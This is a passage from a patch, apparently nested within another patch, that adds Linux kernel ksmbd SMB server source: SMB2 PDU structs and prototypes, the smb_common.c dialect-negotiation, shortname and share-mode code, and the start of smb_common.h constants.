++	__le32 NextEntryOffset;
++	__u8   EaNameLength;
++	char name[1];
++} __packed; /* level 15 Query */
++
++struct smb2_ea_info {
++	__le32 NextEntryOffset;
++	__u8   Flags;
++	__u8   EaNameLength;
++	__le16 EaValueLength;
++	char name[1];
++	/* optionally followed by value */
++} __packed; /* level 15 Query */
++
++struct create_ea_buf_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct smb2_ea_info ea;
++} __packed;
++
++struct create_sd_buf_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct smb_ntsd ntsd;
++} __packed;
++
++struct smb2_posix_info {
++	__le32 NextEntryOffset;
++	__u32 Ignored;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 DosAttributes;
++	__le64 Inode;
++	__le32 DeviceId;
++	__le32 Zero;
++	/* beginning of POSIX Create Context Response */
++	__le32 HardLinks;
++	__le32 ReparseTag;
++	__le32 Mode;
++	/* SidBuffer contain two sids (UNIX user sid(16), UNIX group sid(16)) */
++	u8 SidBuffer[32];
++	__le32 name_len;
++	u8 name[1];
++	/*
++	 * var sized owner SID
++	 * var sized group SID
++	 * le32 filenamelength
++	 * u8  filename[]
++	 */
++} __packed;
++
++/* functions */
++void init_smb2_1_server(struct ksmbd_conn *conn);
++void init_smb3_0_server(struct ksmbd_conn *conn);
++void init_smb3_02_server(struct ksmbd_conn *conn);
++int init_smb3_11_server(struct ksmbd_conn *conn);
++
++void init_smb2_max_read_size(unsigned int sz);
++void init_smb2_max_write_size(unsigned int sz);
++void init_smb2_max_trans_size(unsigned int sz);
++void init_smb2_max_credits(unsigned int sz);
++
++bool is_smb2_neg_cmd(struct ksmbd_work *work);
++bool is_smb2_rsp(struct ksmbd_work *work);
++
++u16 get_smb2_cmd_val(struct ksmbd_work *work);
++void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err);
++int init_smb2_rsp_hdr(struct ksmbd_work *work);
++int smb2_allocate_rsp_buf(struct ksmbd_work *work);
++bool is_chained_smb2_message(struct ksmbd_work *work);
++int init_smb2_neg_rsp(struct ksmbd_work *work);
++void smb2_set_err_rsp(struct ksmbd_work *work);
++int smb2_check_user_session(struct ksmbd_work *work);
++int smb2_get_ksmbd_tcon(struct ksmbd_work *work);
++bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command);
++int smb2_check_sign_req(struct ksmbd_work *work);
++void smb2_set_sign_rsp(struct ksmbd_work *work);
++int smb3_check_sign_req(struct ksmbd_work *work);
++void smb3_set_sign_rsp(struct ksmbd_work *work);
++int find_matching_smb2_dialect(int start_index, __le16 *cli_dialects,
++			       __le16 dialects_count);
++struct file_lock *smb_flock_init(struct file *f);
++int setup_async_work(struct ksmbd_work *work, void (*fn)(void **),
++		     void **arg);
++void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status);
++struct channel *lookup_chann_list(struct ksmbd_session *sess,
++				  struct ksmbd_conn *conn);
++void smb3_preauth_hash_rsp(struct ksmbd_work *work);
++bool smb3_is_transform_hdr(void *buf);
++int smb3_decrypt_req(struct ksmbd_work *work);
++int smb3_encrypt_resp(struct ksmbd_work *work);
++bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work);
++int smb2_set_rsp_credits(struct ksmbd_work *work);
++bool smb3_encryption_negotiated(struct ksmbd_conn *conn);
++
++/* smb2 misc functions */
++int ksmbd_smb2_check_message(struct ksmbd_work *work);
++
++/* smb2 command handlers */
++int smb2_handle_negotiate(struct ksmbd_work *work);
++int smb2_negotiate_request(struct ksmbd_work *work);
++int smb2_sess_setup(struct ksmbd_work *work);
++int smb2_tree_connect(struct ksmbd_work *work);
++int smb2_tree_disconnect(struct ksmbd_work *work);
++int smb2_session_logoff(struct ksmbd_work *work);
++int smb2_open(struct ksmbd_work *work);
++int smb2_query_info(struct ksmbd_work *work);
++int smb2_query_dir(struct ksmbd_work *work);
++int smb2_close(struct ksmbd_work *work);
++int smb2_echo(struct ksmbd_work *work);
++int smb2_set_info(struct ksmbd_work *work);
++int smb2_read(struct ksmbd_work *work);
++int smb2_write(struct ksmbd_work *work);
++int smb2_flush(struct ksmbd_work *work);
++int smb2_cancel(struct ksmbd_work *work);
++int smb2_lock(struct ksmbd_work *work);
++int smb2_ioctl(struct ksmbd_work *work);
++int smb2_oplock_break(struct ksmbd_work *work);
++int smb2_notify(struct ksmbd_work *ksmbd_work);
++
++/*
++ * Get the body of the smb2 message excluding the 4 byte rfc1002 headers
++ * from request/response buffer.
++ */
++static inline void *smb2_get_msg(void *buf)
++{
++	return buf + 4;
++}
++
++#endif	/* _SMB2PDU_H */
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+new file mode 100644
+index 0000000000000..05d7f3e910bf4
+--- /dev/null
++++ b/fs/smb/server/smb_common.c
+@@ -0,0 +1,797 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ *   Copyright (C) 2018 Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++#include <linux/user_namespace.h>
++
++#include "smb_common.h"
++#include "server.h"
++#include "misc.h"
++#include "smbstatus.h"
++#include "connection.h"
++#include "ksmbd_work.h"
++#include "mgmt/user_session.h"
++#include "mgmt/user_config.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/share_config.h"
++
++/*for shortname implementation */
++static const char basechars[43] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-!@#$%";
++#define MANGLE_BASE (sizeof(basechars) / sizeof(char) - 1)
++#define MAGIC_CHAR '~'
++#define PERIOD '.'
++#define mangle(V) ((char)(basechars[(V) % MANGLE_BASE]))
++
++struct smb_protocol {
++	int		index;
++	char		*name;
++	char		*prot;
++	__u16		prot_id;
++};
++
++static struct smb_protocol smb1_protos[] = {
++	{
++		SMB21_PROT,
++		"\2SMB 2.1",
++		"SMB2_10",
++		SMB21_PROT_ID
++	},
++	{
++		SMB2X_PROT,
++		"\2SMB 2.???",
++		"SMB2_22",
++		SMB2X_PROT_ID
++	},
++};
++
++static struct smb_protocol smb2_protos[] = {
++	{
++		SMB21_PROT,
++		"\2SMB 2.1",
++		"SMB2_10",
++		SMB21_PROT_ID
++	},
++	{
++		SMB30_PROT,
++		"\2SMB 3.0",
++		"SMB3_00",
++		SMB30_PROT_ID
++	},
++	{
++		SMB302_PROT,
++		"\2SMB 3.02",
++		"SMB3_02",
++		SMB302_PROT_ID
++	},
++	{
++		SMB311_PROT,
++		"\2SMB 3.1.1",
++		"SMB3_11",
++		SMB311_PROT_ID
++	},
++};
++
++unsigned int ksmbd_server_side_copy_max_chunk_count(void)
++{
++	return 256;
++}
++
++unsigned int ksmbd_server_side_copy_max_chunk_size(void)
++{
++	return (2U << 30) - 1;
++}
++
++unsigned int ksmbd_server_side_copy_max_total_size(void)
++{
++	return (2U << 30) - 1;
++}
++
++inline int ksmbd_min_protocol(void)
++{
++	return SMB21_PROT;
++}
++
++inline int ksmbd_max_protocol(void)
++{
++	return SMB311_PROT;
++}
++
++int ksmbd_lookup_protocol_idx(char *str)
++{
++	int offt = ARRAY_SIZE(smb1_protos) - 1;
++	int len = strlen(str);
++
++	while (offt >= 0) {
++		if (!strncmp(str, smb1_protos[offt].prot, len)) {
++			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
++				    smb1_protos[offt].prot, offt);
++			return smb1_protos[offt].index;
++		}
++		offt--;
++	}
++
++	offt = ARRAY_SIZE(smb2_protos) - 1;
++	while (offt >= 0) {
++		if (!strncmp(str, smb2_protos[offt].prot, len)) {
++			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
++				    smb2_protos[offt].prot, offt);
++			return smb2_protos[offt].index;
++		}
++		offt--;
++	}
++	return -1;
++}
++
++/**
++ * ksmbd_verify_smb_message() - check for valid smb2 request header
++ * @work:	smb work
++ *
++ * check for valid smb signature and packet direction(request/response)
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int ksmbd_verify_smb_message(struct ksmbd_work *work)
++{
++	struct smb2_hdr *smb2_hdr = ksmbd_req_buf_next(work);
++	struct smb_hdr *hdr;
++
++	if (smb2_hdr->ProtocolId == SMB2_PROTO_NUMBER)
++		return ksmbd_smb2_check_message(work);
++
++	hdr = work->request_buf;
++	if (*(__le32 *)hdr->Protocol == SMB1_PROTO_NUMBER &&
++	    hdr->Command == SMB_COM_NEGOTIATE) {
++		work->conn->outstanding_credits++;
++		return 0;
++	}
++
++	return -EINVAL;
++}
++
++/**
++ * ksmbd_smb_request() - check for valid smb request type
++ * @conn:	connection instance
++ *
++ * Return:      true on success, otherwise false
++ */
++bool ksmbd_smb_request(struct ksmbd_conn *conn)
++{
++	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
++
++	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
++		pr_err_ratelimited("smb2 compression not support yet");
++		return false;
++	}
++
++	if (*proto != SMB1_PROTO_NUMBER &&
++	    *proto != SMB2_PROTO_NUMBER &&
++	    *proto != SMB2_TRANSFORM_PROTO_NUM)
++		return false;
++
++	return true;
++}
++
++static bool supported_protocol(int idx)
++{
++	if (idx == SMB2X_PROT &&
++	    (server_conf.min_protocol >= SMB21_PROT ||
++	     server_conf.max_protocol <= SMB311_PROT))
++		return true;
++
++	return (server_conf.min_protocol <= idx &&
++		idx <= server_conf.max_protocol);
++}
++
++static char *next_dialect(char *dialect, int *next_off, int bcount)
++{
++	dialect = dialect + *next_off;
++	*next_off = strnlen(dialect, bcount);
++	if (dialect[*next_off] != '\0')
++		return NULL;
++	return dialect;
++}
++
++static int ksmbd_lookup_dialect_by_name(char *cli_dialects, __le16 byte_count)
++{
++	int i, seq_num, bcount, next;
++	char *dialect;
++
++	for (i = ARRAY_SIZE(smb1_protos) - 1; i >= 0; i--) {
++		seq_num = 0;
++		next = 0;
++		dialect = cli_dialects;
++		bcount = le16_to_cpu(byte_count);
++		do {
++			dialect = next_dialect(dialect, &next, bcount);
++			if (!dialect)
++				break;
++			ksmbd_debug(SMB, "client requested dialect %s\n",
++				    dialect);
++			if (!strcmp(dialect, smb1_protos[i].name)) {
++				if (supported_protocol(smb1_protos[i].index)) {
++					ksmbd_debug(SMB,
++						    "selected %s dialect\n",
++						    smb1_protos[i].name);
++					if (smb1_protos[i].index == SMB1_PROT)
++						return seq_num;
++					return smb1_protos[i].prot_id;
++				}
++			}
++			seq_num++;
++			bcount -= (++next);
++		} while (bcount > 0);
++	}
++
++	return BAD_PROT_ID;
++}
++
++int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count)
++{
++	int i;
++	int count;
++
++	for (i = ARRAY_SIZE(smb2_protos) - 1; i >= 0; i--) {
++		count = le16_to_cpu(dialects_count);
++		while (--count >= 0) {
++			ksmbd_debug(SMB, "client requested dialect 0x%x\n",
++				    le16_to_cpu(cli_dialects[count]));
++			if (le16_to_cpu(cli_dialects[count]) !=
++					smb2_protos[i].prot_id)
++				continue;
++
++			if (supported_protocol(smb2_protos[i].index)) {
++				ksmbd_debug(SMB, "selected %s dialect\n",
++					    smb2_protos[i].name);
++				return smb2_protos[i].prot_id;
++			}
++		}
++	}
++
++	return BAD_PROT_ID;
++}
++
++static int ksmbd_negotiate_smb_dialect(void *buf)
++{
++	int smb_buf_length = get_rfc1002_len(buf);
++	__le32 proto = ((struct smb2_hdr *)smb2_get_msg(buf))->ProtocolId;
++
++	if (proto == SMB2_PROTO_NUMBER) {
++		struct smb2_negotiate_req *req;
++		int smb2_neg_size =
++			offsetof(struct smb2_negotiate_req, Dialects);
++
++		req = (struct smb2_negotiate_req *)smb2_get_msg(buf);
++		if (smb2_neg_size > smb_buf_length)
++			goto err_out;
++
++		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		    smb_buf_length)
++			goto err_out;
++
++		return ksmbd_lookup_dialect_by_id(req->Dialects,
++						  req->DialectCount);
++	}
++
++	proto = *(__le32 *)((struct smb_hdr *)buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER) {
++		struct smb_negotiate_req *req;
++
++		req = (struct smb_negotiate_req *)buf;
++		if (le16_to_cpu(req->ByteCount) < 2)
++			goto err_out;
++
++		if (offsetof(struct smb_negotiate_req, DialectsArray) - 4 +
++			le16_to_cpu(req->ByteCount) > smb_buf_length) {
++			goto err_out;
++		}
++
++		return ksmbd_lookup_dialect_by_name(req->DialectsArray,
++						    req->ByteCount);
++	}
++
++err_out:
++	return BAD_PROT_ID;
++}
++
++#define SMB_COM_NEGOTIATE_EX	0x0
++
++/**
++ * get_smb1_cmd_val() - get smb command value from smb header
++ * @work:	smb work containing smb header
++ *
++ * Return:      smb command value
++ */
++static u16 get_smb1_cmd_val(struct ksmbd_work *work)
++{
++	return SMB_COM_NEGOTIATE_EX;
++}
++
++/**
++ * init_smb1_rsp_hdr() - initialize smb negotiate response header
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++static int init_smb1_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
++	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
++
++	/*
++	 * Remove 4 byte direct TCP header.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4);
++
++	rsp_hdr->Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
++	rsp_hdr->Flags = SMBFLG_RESPONSE;
++	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++	rsp_hdr->Pid = rcv_hdr->Pid;
++	rsp_hdr->Mid = rcv_hdr->Mid;
++	return 0;
++}
++
++/**
++ * smb1_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb1_check_user_session(struct ksmbd_work *work)
++{
++	unsigned int cmd = work->conn->ops->get_cmd_val(work);
++
++	if (cmd == SMB_COM_NEGOTIATE_EX)
++		return 0;
++
++	return -EINVAL;
++}
++
++/**
++ * smb1_allocate_rsp_buf() - allocate response buffer for a command
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL | __GFP_ZERO);
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++
++	if (!work->response_buf) {
++		pr_err("Failed to allocate %u bytes buffer\n",
++				MAX_CIFS_SMALL_BUFFER_SIZE);
++		return -ENOMEM;
++	}
++
++	return 0;
++}
++
++static struct smb_version_ops smb1_server_ops = {
++	.get_cmd_val = get_smb1_cmd_val,
++	.init_rsp_hdr = init_smb1_rsp_hdr,
++	.allocate_rsp_buf = smb1_allocate_rsp_buf,
++	.check_user_session = smb1_check_user_session,
++};
++
++static int smb1_negotiate(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
++}
++
++static struct smb_version_cmds smb1_server_cmds[1] = {
++	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
++};
++
++static void init_smb1_server(struct ksmbd_conn *conn)
++{
++	conn->ops = &smb1_server_ops;
++	conn->cmds = smb1_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++}
++
++void ksmbd_init_smb_server(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	__le32 proto;
++
++	if (conn->need_neg == false)
++		return;
++
++	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER)
++		init_smb1_server(conn);
++	else
++		init_smb3_11_server(conn);
++}
++
++int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
++				      struct ksmbd_file *dir,
++				      struct ksmbd_dir_info *d_info,
++				      char *search_pattern,
++				      int (*fn)(struct ksmbd_conn *, int,
++						struct ksmbd_dir_info *,
++						struct ksmbd_kstat *))
++{
++	int i, rc = 0;
++	struct ksmbd_conn *conn = work->conn;
++	struct user_namespace *user_ns = file_mnt_user_ns(dir->filp);
++
++	for (i = 0; i < 2; i++) {
++		struct kstat kstat;
++		struct ksmbd_kstat ksmbd_kstat;
++		struct dentry *dentry;
++
++		if (!dir->dot_dotdot[i]) { /* fill dot entry info */
++			if (i == 0) {
++				d_info->name = ".";
++				d_info->name_len = 1;
++				dentry = dir->filp->f_path.dentry;
++			} else {
++				d_info->name = "..";
++				d_info->name_len = 2;
++				dentry = dir->filp->f_path.dentry->d_parent;
++			}
++
++			if (!match_pattern(d_info->name, d_info->name_len,
++					   search_pattern)) {
++				dir->dot_dotdot[i] = 1;
++				continue;
++			}
++
++			ksmbd_kstat.kstat = &kstat;
++			ksmbd_vfs_fill_dentry_attrs(work,
++						    user_ns,
++						    dentry,
++						    &ksmbd_kstat);
++			rc = fn(conn, info_level, d_info, &ksmbd_kstat);
++			if (rc)
++				break;
++			if (d_info->out_buf_len <= 0)
++				break;
++
++			dir->dot_dotdot[i] = 1;
++			if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY) {
++				d_info->out_buf_len = 0;
++				break;
++			}
++		}
++	}
++
++	return rc;
++}
++
++/**
++ * ksmbd_extract_shortname() - get shortname from long filename
++ * @conn:	connection instance
++ * @longname:	source long filename
++ * @shortname:	destination short filename
++ *
++ * Return:	shortname length or 0 when source long name is '.' or '..'
++ * TODO: Though this function comforms the restriction of 8.3 Filename spec,
++ * but the result is different with Windows 7's one. need to check.
++ */
++int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
++			    char *shortname)
++{
++	const char *p;
++	char base[9], extension[4];
++	char out[13] = {0};
++	int baselen = 0;
++	int extlen = 0, len = 0;
++	unsigned int csum = 0;
++	const unsigned char *ptr;
++	bool dot_present = true;
++
++	p = longname;
++	if ((*p == '.') || (!(strcmp(p, "..")))) {
++		/*no mangling required */
++		return 0;
++	}
++
++	p = strrchr(longname, '.');
++	if (p == longname) { /*name starts with a dot*/
++		strscpy(extension, "___", strlen("___"));
++	} else {
++		if (p) {
++			p++;
++			while (*p && extlen < 3) {
++				if (*p != '.')
++					extension[extlen++] = toupper(*p);
++				p++;
++			}
++			extension[extlen] = '\0';
++		} else {
++			dot_present = false;
++		}
++	}
++
++	p = longname;
++	if (*p == '.') {
++		p++;
++		longname++;
++	}
++	while (*p && (baselen < 5)) {
++		if (*p != '.')
++			base[baselen++] = toupper(*p);
++		p++;
++	}
++
++	base[baselen] = MAGIC_CHAR;
++	memcpy(out, base, baselen + 1);
++
++	ptr = longname;
++	len = strlen(longname);
++	for (; len > 0; len--, ptr++)
++		csum += *ptr;
++
++	csum = csum % (MANGLE_BASE * MANGLE_BASE);
++	out[baselen + 1] = mangle(csum / MANGLE_BASE);
++	out[baselen + 2] = mangle(csum);
++	out[baselen + 3] = PERIOD;
++
++	if (dot_present)
++		memcpy(&out[baselen + 4], extension, 4);
++	else
++		out[baselen + 4] = '\0';
++	smbConvertToUTF16((__le16 *)shortname, out, PATH_MAX,
++			  conn->local_nls, 0);
++	len = strlen(out) * 2;
++	return len;
++}
++
++static int __smb2_negotiate(struct ksmbd_conn *conn)
++{
++	return (conn->dialect >= SMB20_PROT_ID &&
++		conn->dialect <= SMB311_PROT_ID);
++}
++
++static int smb_handle_negotiate(struct ksmbd_work *work)
++{
++	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
++
++	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
++
++	/* Add 2 byte bcc and 2 byte DialectIndex. */
++	inc_rfc1001_len(work->response_buf, 4);
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++
++	neg_rsp->hdr.WordCount = 1;
++	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
++	neg_rsp->ByteCount = 0;
++	return 0;
++}
++
++int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
++{
++	struct ksmbd_conn *conn = work->conn;
++	int ret;
++
++	conn->dialect =
++		ksmbd_negotiate_smb_dialect(work->request_buf);
++	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
++
++	if (command == SMB2_NEGOTIATE_HE) {
++		ret = smb2_handle_negotiate(work);
++		return ret;
++	}
++
++	if (command == SMB_COM_NEGOTIATE) {
++		if (__smb2_negotiate(conn)) {
++			init_smb3_11_server(conn);
++			init_smb2_neg_rsp(work);
++			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
++			return 0;
++		}
++		return smb_handle_negotiate(work);
++	}
++
++	pr_err("Unknown SMB negotiation command: %u\n", command);
++	return -EINVAL;
++}
++
++enum SHARED_MODE_ERRORS {
++	SHARE_DELETE_ERROR,
++	SHARE_READ_ERROR,
++	SHARE_WRITE_ERROR,
++	FILE_READ_ERROR,
++	FILE_WRITE_ERROR,
++	FILE_DELETE_ERROR,
++};
++
++static const char * const shared_mode_errors[] = {
++	"Current access mode does not permit SHARE_DELETE",
++	"Current access mode does not permit SHARE_READ",
++	"Current access mode does not permit SHARE_WRITE",
++	"Desired access mode does not permit FILE_READ",
++	"Desired access mode does not permit FILE_WRITE",
++	"Desired access mode does not permit FILE_DELETE",
++};
++
++static void smb_shared_mode_error(int error, struct ksmbd_file *prev_fp,
++				  struct ksmbd_file *curr_fp)
++{
++	ksmbd_debug(SMB, "%s\n", shared_mode_errors[error]);
++	ksmbd_debug(SMB, "Current mode: 0x%x Desired mode: 0x%x\n",
++		    prev_fp->saccess, curr_fp->daccess);
++}
++
++int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp)
++{
++	int rc = 0;
++	struct ksmbd_file *prev_fp;
++
++	/*
++	 * Lookup fp in master fp list, and check desired access and
++	 * shared mode between previous open and current open.
++	 */
++	read_lock(&curr_fp->f_ci->m_lock);
++	list_for_each_entry(prev_fp, &curr_fp->f_ci->m_fp_list, node) {
++		if (file_inode(filp) != file_inode(prev_fp->filp))
++			continue;
++
++		if (filp == prev_fp->filp)
++			continue;
++
++		if (ksmbd_stream_fd(prev_fp) && ksmbd_stream_fd(curr_fp))
++			if (strcmp(prev_fp->stream.name, curr_fp->stream.name))
++				continue;
++
++		if (prev_fp->attrib_only != curr_fp->attrib_only)
++			continue;
++
++		if (!(prev_fp->saccess & FILE_SHARE_DELETE_LE) &&
++		    curr_fp->daccess & FILE_DELETE_LE) {
++			smb_shared_mode_error(SHARE_DELETE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		/*
++		 * Only check FILE_SHARE_DELETE if stream opened and
++		 * normal file opened.
++		 */
++		if (ksmbd_stream_fd(prev_fp) && !ksmbd_stream_fd(curr_fp))
++			continue;
++
++		if (!(prev_fp->saccess & FILE_SHARE_READ_LE) &&
++		    curr_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE)) {
++			smb_shared_mode_error(SHARE_READ_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (!(prev_fp->saccess & FILE_SHARE_WRITE_LE) &&
++		    curr_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE)) {
++			smb_shared_mode_error(SHARE_WRITE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (prev_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE) &&
++		    !(curr_fp->saccess & FILE_SHARE_READ_LE)) {
++			smb_shared_mode_error(FILE_READ_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (prev_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE) &&
++		    !(curr_fp->saccess & FILE_SHARE_WRITE_LE)) {
++			smb_shared_mode_error(FILE_WRITE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (prev_fp->daccess & FILE_DELETE_LE &&
++		    !(curr_fp->saccess & FILE_SHARE_DELETE_LE)) {
++			smb_shared_mode_error(FILE_DELETE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++	}
++	read_unlock(&curr_fp->f_ci->m_lock);
++
++	return rc;
++}
++
++bool is_asterisk(char *p)
++{
++	return p && p[0] == '*';
++}
++
++int ksmbd_override_fsids(struct ksmbd_work *work)
++{
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_share_config *share = work->tcon->share_conf;
++	struct cred *cred;
++	struct group_info *gi;
++	unsigned int uid;
++	unsigned int gid;
++
++	uid = user_uid(sess->user);
++	gid = user_gid(sess->user);
++	if (share->force_uid != KSMBD_SHARE_INVALID_UID)
++		uid = share->force_uid;
++	if (share->force_gid != KSMBD_SHARE_INVALID_GID)
++		gid = share->force_gid;
++
++	cred = prepare_kernel_cred(NULL);
++	if (!cred)
++		return -ENOMEM;
++
++	cred->fsuid = make_kuid(&init_user_ns, uid);
++	cred->fsgid = make_kgid(&init_user_ns, gid);
++
++	gi = groups_alloc(0);
++	if (!gi) {
++		abort_creds(cred);
++		return -ENOMEM;
++	}
++	set_groups(cred, gi);
++	put_group_info(gi);
++
++	if (!uid_eq(cred->fsuid, GLOBAL_ROOT_UID))
++		cred->cap_effective = cap_drop_fs_set(cred->cap_effective);
++
++	WARN_ON(work->saved_cred);
++	work->saved_cred = override_creds(cred);
++	if (!work->saved_cred) {
++		abort_creds(cred);
++		return -EINVAL;
++	}
++	return 0;
++}
++
++void ksmbd_revert_fsids(struct ksmbd_work *work)
++{
++	const struct cred *cred;
++
++	WARN_ON(!work->saved_cred);
++
++	cred = current_cred();
++	revert_creds(work->saved_cred);
++	put_cred(cred);
++	work->saved_cred = NULL;
++}
++
++__le32 smb_map_generic_desired_access(__le32 daccess)
++{
++	if (daccess & FILE_GENERIC_READ_LE) {
++		daccess |= cpu_to_le32(GENERIC_READ_FLAGS);
++		daccess &= ~FILE_GENERIC_READ_LE;
++	}
++
++	if (daccess & FILE_GENERIC_WRITE_LE) {
++		daccess |= cpu_to_le32(GENERIC_WRITE_FLAGS);
++		daccess &= ~FILE_GENERIC_WRITE_LE;
++	}
++
++	if (daccess & FILE_GENERIC_EXECUTE_LE) {
++		daccess |= cpu_to_le32(GENERIC_EXECUTE_FLAGS);
++		daccess &= ~FILE_GENERIC_EXECUTE_LE;
++	}
++
++	if (daccess & FILE_GENERIC_ALL_LE) {
++		daccess |= cpu_to_le32(GENERIC_ALL_FLAGS);
++		daccess &= ~FILE_GENERIC_ALL_LE;
++	}
++
++	return daccess;
++}
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+new file mode 100644
+index 0000000000000..e63d2a4f466b5
+--- /dev/null
++++ b/fs/smb/server/smb_common.h
+@@ -0,0 +1,468 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __SMB_COMMON_H__
++#define __SMB_COMMON_H__
++
++#include <linux/kernel.h>
++
++#include "glob.h"
++#include "nterr.h"
++#include "../common/smb2pdu.h"
++#include "smb2pdu.h"
++
++/* ksmbd's Specific ERRNO */
++#define ESHARE			50000
++
++#define SMB1_PROT		0
++#define SMB2_PROT		1
++#define SMB21_PROT		2
++/* multi-protocol negotiate request */
++#define SMB2X_PROT		3
++#define SMB30_PROT		4
++#define SMB302_PROT		5
++#define SMB311_PROT		6
++#define BAD_PROT		0xFFFF
++
++#define SMB1_VERSION_STRING	"1.0"
++#define SMB20_VERSION_STRING	"2.0"
++#define SMB21_VERSION_STRING	"2.1"
++#define SMB30_VERSION_STRING	"3.0"
++#define SMB302_VERSION_STRING	"3.02"
++#define SMB311_VERSION_STRING	"3.1.1"
++
++#define SMB_ECHO_INTERVAL	(60 * HZ)
++
++#define CIFS_DEFAULT_IOSIZE	(64 * 1024)
++#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
++
++#define MAX_STREAM_PROT_LEN	0x00FFFFFF
++
++/* Responses when opening a file. */
++#define F_SUPERSEDED	0
++#define F_OPENED	1
++#define F_CREATED	2
++#define F_OVERWRITTEN	3
++
++/*
++ * File Attribute flags
++ */
++#define ATTR_POSIX_SEMANTICS		0x01000000
++#define ATTR_BACKUP_SEMANTICS		0x02000000
++#define ATTR_DELETE_ON_CLOSE		0x04000000
++#define ATTR_SEQUENTIAL_SCAN		0x08000000
++#define ATTR_RANDOM_ACCESS		0x10000000
++#define ATTR_NO_BUFFERING		0x20000000
++#define ATTR_WRITE_THROUGH		0x80000000
++
++/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
++#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
++#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
++#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
++#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
++#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
++#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
++#define FILE_SUPPORTS_HARD_LINKS	0x00400000
++#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
++#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
